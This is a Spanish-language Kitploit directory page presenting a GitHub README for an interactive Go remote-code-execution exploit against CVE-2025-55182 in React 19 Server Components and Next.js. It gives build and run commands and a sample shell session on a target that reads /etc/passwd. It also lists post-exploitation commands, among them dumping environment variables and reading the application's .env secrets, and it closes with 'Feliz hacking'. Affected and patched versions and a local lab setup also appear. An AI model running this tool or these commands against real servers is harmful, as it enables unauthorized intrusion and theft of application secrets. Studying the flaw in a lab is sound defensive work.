Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-55182 — Herramienta de explotación de RCE dirigida a CVE-2025-55182, una vulnerabilidad crítica en React Server Components (RSC) que afecta a React 19.0.0 - 19.2.0 y a aplicaciones Next.js. | Kitploit
Herramientas/GitHubGitHub/yyax13/cve-2025-55182
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlRed TeamingDesarrollo de Payloads
GitHubyyax13/cve-2025-55182

CVE-2025-55182

Herramienta de explotación de RCE dirigida a CVE-2025-55182, una vulnerabilidad crítica en React Server Components (RSC) que afecta a React 19.0.0 - 19.2.0 y a aplicaciones Next.js.

Ver Repositorio
1hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

👻 Exploit en Go para CVE-2025-55182

Herramienta interactiva de explotación RCE para CVE-2025-55182 (React Server Components)

GitHub Stars License Go

🎯 ¿Qué es esto?

CVE-2025-55182 es una herramienta mínima e interactiva de explotación RCE dirigida a CVE-2025-55182, una vulnerabilidad crítica en React Server Components (RSC) que afecta a React 19.0.0 - 19.2.0 y a aplicaciones Next.js.


📦 Instalación

Requisitos previos

  • Go 1.18 o superior
  • Un objetivo vulnerable que ejecute React 19.0.0 - 19.2.0

Compilar desde el código fuente

root@kitploit:~
git clone https://github.com/Hghost0x00/CVE-2025-55182.git
cd CVE-2025-55182
go build -o CVE-2025-55182 main.go

🚀 Uso

Uso básico

root@kitploit:~
./CVE-2025-55182

Sesión interactiva

root@kitploit:~
_____________   _______________         _______________   ________   .________          .________.____________  ______  ________  
╲_   ___ ╲   ╲ ╱   ╱╲_   _____╱         ╲_____  ╲   _  ╲  ╲_____  ╲  │   ____╱          │   ____╱│   ____╱_   │╱  __  ╲ ╲_____  ╲ 
╱    ╲  ╲╱╲   Y   ╱  │    __)_   ______  ╱  ____╱  ╱_╲  ╲  ╱  ____╱  │____  ╲   ______  │____  ╲ │____  ╲ │   │>      <  ╱  ____╱ 
╲     ╲____╲     ╱   │        ╲ ╱_____╱ ╱       ╲  ╲_╱   ╲╱       ╲  ╱       ╲ ╱_____╱  ╱       ╲╱       ╲│   ╱   ──   ╲╱       ╲ 
 ╲______  ╱ ╲___╱   ╱_______  ╱         ╲_______ ╲_____  ╱╲_______ ╲╱______  ╱         ╱______  ╱______  ╱│___╲______  ╱╲_______ ╲
        ╲╱                  ╲╱                  ╲╱     ╲╱         ╲╱       ╲╱                 ╲╱       ╲╱            ╲╱         ╲╱  

    React2Shell RCE | CVE-2025-55182
    @hghost010

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[?] Target: localhost:3000
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[+] VULNERABLE
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

ghost@rce $ id
uid=1000(node) gid=1000(node) groups=1000(node)

ghost@rce $ whoami
node

ghost@rce $ pwd
/app

ghost@rce $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
node:x:1000:1000::/home/node:/bin/bash

ghost@rce $ exit

🎥 Demo

https://github.com/user-attachments/assets/9cfdc436-9217-4921-bdbd-1368378f049f


Versiones afectadas:

  • React 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • Aplicaciones Next.js que usen estas versiones de React

Versiones parcheadas:

  • React 19.2.1+
  • Next.js con la dependencia de React actualizada

🧪 Configuración del laboratorio de pruebas

¿Quieres probarlo de forma segura? Configura un entorno de laboratorio vulnerable:

root@kitploit:~
# Clona la aplicación Next.js vulnerable
git clone https://github.com/zack0x01/vuln-app-CVE-2025-55182.git
cd vuln-app-CVE-2025-55182

# Instala y ejecuta
npm install --legacy-peer-deps
npm run dev

# En otra terminal, ejecuta ghost-scanner
./CVE-2025-55182
# Introduce: localhost:3000

📚 Comandos comunes

root@kitploit:~
ghost@rce $ id                    # Comprueba los privilegios del usuario
ghost@rce $ whoami                # Nombre de usuario actual
ghost@rce $ pwd                   # Directorio actual
ghost@rce $ ls -la                # Lista los archivos
ghost@rce $ cat /etc/passwd       # Lee archivos
ghost@rce $ uname -a              # Información del sistema
ghost@rce $ env                   # Variables de entorno
ghost@rce $ ps aux                # Procesos en ejecución
ghost@rce $ netstat -tulpn        # Conexiones de red
ghost@rce $ cat /app/.env         # Secretos de la aplicación

📊 Estadísticas del repositorio

GitHub repo size GitHub last commit GitHub issues


🔗 Referencias

  • Detalles de CVE-2025-55182
  • Aviso de seguridad de React
  • Aviso de seguridad de Next.js
  • PoC original de maple3142
  • Investigación de Assetnote
  • Aplicación de prueba vulnerable

💬 Comunidad y soporte

  • 🐦 Twitter/X: @hghost010
  • 🐙 GitHub: Hghost0x00

¿Encontraste un bug? Abre un issue


⭐ Muestra tu apoyo

Si esta herramienta te ayudó:

  • ⭐ Marca este repositorio con una estrella
  • 💬 Compártela con otros

📝 Licencia

Este proyecto está licenciado bajo la Licencia MIT; consulta el archivo LICENSE para más detalles.


Hecho con 👻 por Hghost0x00
Feliz hacking ⚡

Descargar herramienta